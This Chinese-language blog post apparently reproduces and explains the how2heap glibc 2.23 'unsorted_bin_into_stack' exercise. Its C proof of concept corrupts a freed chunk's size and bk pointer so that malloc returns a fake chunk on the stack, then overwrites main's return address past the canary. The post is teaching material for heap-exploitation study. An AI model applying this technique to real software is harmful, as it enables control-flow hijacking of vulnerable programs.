当前位置: 首页 > news >正文

how2heap-2.23-06-unsorted_bin_into_stack

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>// 从 unsorted bin 的 bk 去找合适的
void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); }int main() {intptr_t stack_buffer[4] = {0};fprintf(stderr, "先申请 victim chunk\n");intptr_t* victim = malloc(0x100);fprintf(stderr, "再申请一块防止与 top chunk 合并\n");intptr_t* p1 = malloc(0x100);fprintf(stderr, "把 %p 这块给释放掉, 会被放进 unsorted bin 中\n", victim);free(victim);fprintf(stderr, "在栈上伪造一个 chunk");fprintf(stderr, "设置 size 与指向可写地址的 bk 指针");stack_buffer[1] = 0x100 + 0x10;stack_buffer[3] = (intptr_t)stack_buffer;//------------VULNERABILITY-----------fprintf(stderr, "假设有一个漏洞可以覆盖 victim 的 size 和 bk 指针\n");fprintf(stderr, "大小应与下一个请求大小不同,以返回 fake chunk 而不是这个,并且需要通过检查(2*SIZE_SZ 到 av->system_mem)\n");victim[-1] = 32;victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stackfprintf(stderr, "现在 malloc 的时候将会返回构造的那个 fake chunk 那里: %p\n", &stack_buffer[2]);char *p2 = malloc(0x100);fprintf(stderr, "malloc(0x100): %p\n", p2);intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcodememcpy((p2+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
}

unsorted_bin_into_stackunsorted_bin_attack 利用场景不一样,unsorted_bin_into_stack 反而好理解一些

  • unsorted_bin_attack 修改特定位置的内存为一个很大的值
  • unsorted_bin_into_stack 将栈上的空间作为chunk进行分配

在unsorted_bin_into_stack触发前,内存的布局

在这里插入图片描述
通过how2heap-2.23-05-unsorted_bin_attack知道:

  • 在申请chunk时,会首先从bins中进行搜索,当fastbin,small bin中没有合适大小的chunk时,会进入unsorted bin中进行搜索
  • 通过unsorted bin头结点的bk找到最旧释放的chunk,判断该chunk大小是否合适,合适则直接返回,不合适就放到small bin和large bin中
  • unsorted bin链中的chunk,通过chunk bk依次脱链查找,直至unsorted bin清空

触发unsorted_bin_into_stack

在上面的图中,victim chunk是最旧的chunk,所以会先找到这个chunk查看大小是否合适,由于size被修改为0x20,被脱链,放入到small bin中
由于victim bk指向stack_buffer,stack_buffer也会被认为是unsorted bin链中的chunk
stack_buffer chunk的size被修改为0x110,符合malloc(0x100)的大小,脱链,作为可用的chunk分配出来
现在就可以写这个stack_buffer chunk了


最后的两行,就是使用这个这个stack_buffer chunk,往栈中的main的返回地址处写入jackpot函数的地址

http://www.lryc.cn/news/273126.html

相关文章:

  • (学习打卡2)重学Java设计模式之六大设计原则
  • 数据结构:第7章:查找(复习)
  • 编程语言的未来?
  • SpringBoot的测试
  • C++睡眠函数:Windows平台下的Sleep函数和Linux平台的usleep函数
  • 详解白帽子以及红队、蓝队和紫队
  • 1、docker常用技巧:docker数据位置更改
  • Qt之设置QLabel的背景色和前景色
  • 数模学习day06-主成分分析
  • Windows PowerShell的安全目标——安全警报
  • k8s笔记1- 初步认识k8s
  • ARM CCA机密计算软件架构之内存加密上下文(MEC)
  • python基于flask实现一个文本问答系统
  • lambda表达式使用和示例
  • STM32学习笔记十八:WS2812制作像素游戏屏-飞行射击游戏(8)探索游戏多样性,范围伤害模式
  • C#获取windows系统资源使用情况
  • PE解释器之PE文件结构
  • Android—— MIPI屏调试
  • BLE协议—协议栈基础
  • yolov8知识蒸馏代码详解:支持logit和feature-based蒸馏
  • 03-微服务-Ribbon负载均衡
  • 2023新年总结与展望
  • 论文阅读——SG-Former
  • 常用环境部署(十三)——GitLab整体备份及迁移
  • 海外数据中心代理与住宅代理:优缺点全面对比
  • springboot实现OCR
  • 【Scala 】注解
  • 数通基础知识总结
  • 机器学习深度学习面试笔记
  • 安卓和Android是两种不同的操作系统?